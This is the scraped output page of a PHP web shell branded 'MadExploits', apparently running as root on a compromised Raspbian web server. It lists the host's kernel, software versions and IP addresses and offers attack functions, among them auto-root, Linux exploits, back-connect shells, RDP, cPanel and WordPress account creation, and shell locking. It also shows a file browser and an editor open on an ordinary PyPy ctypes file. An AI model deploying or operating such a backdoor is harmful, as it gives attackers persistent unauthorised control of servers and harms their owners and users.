Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
pypy /
lib_pypy /
_ctypes /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
1.47
KB
-rw-r--r--
array.py
9.31
KB
-rw-r--r--
basics.py
9.15
KB
-rw-r--r--
builtin.py
1.21
KB
-rw-r--r--
dll.py
191
B
-rw-r--r--
dummy.py
118
B
-rw-r--r--
function.py
24.89
KB
-rw-r--r--
keepalive.txt
1005
B
-rw-r--r--
pointer.py
6.35
KB
-rw-r--r--
primitive.py
14.29
KB
-rw-r--r--
structure.py
11.63
KB
-rw-r--r--
union.py
167
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : builtin.py
import _rawffi, sys try: from thread import _local as local except ImportError: class local(object): # no threads pass class ConvMode: encoding = 'ascii' errors = 'strict' _memmove_addr = _rawffi.get_libc().getaddressindll('memmove') _memset_addr = _rawffi.get_libc().getaddressindll('memset') def _string_at_addr(addr, lgt): # address here can be almost anything import ctypes cobj = ctypes.c_void_p.from_param(addr) arg = cobj._get_buffer_value() return _rawffi.charp2rawstring(arg, lgt) def set_conversion_mode(encoding, errors): old_cm = ConvMode.encoding, ConvMode.errors ConvMode.errors = errors ConvMode.encoding = encoding return old_cm def _wstring_at_addr(addr, lgt): import ctypes cobj = ctypes.c_void_p.from_param(addr) arg = cobj._get_buffer_value() return _rawffi.wcharp2rawunicode(arg, lgt) _err = local() def get_errno(): return getattr(_err, "errno", 0) def set_errno(errno): old_errno = get_errno() _err.errno = errno return old_errno def get_last_error(): return getattr(_err, "winerror", 0) def set_last_error(winerror): old_winerror = get_last_error() _err.winerror = winerror return old_winerror
Close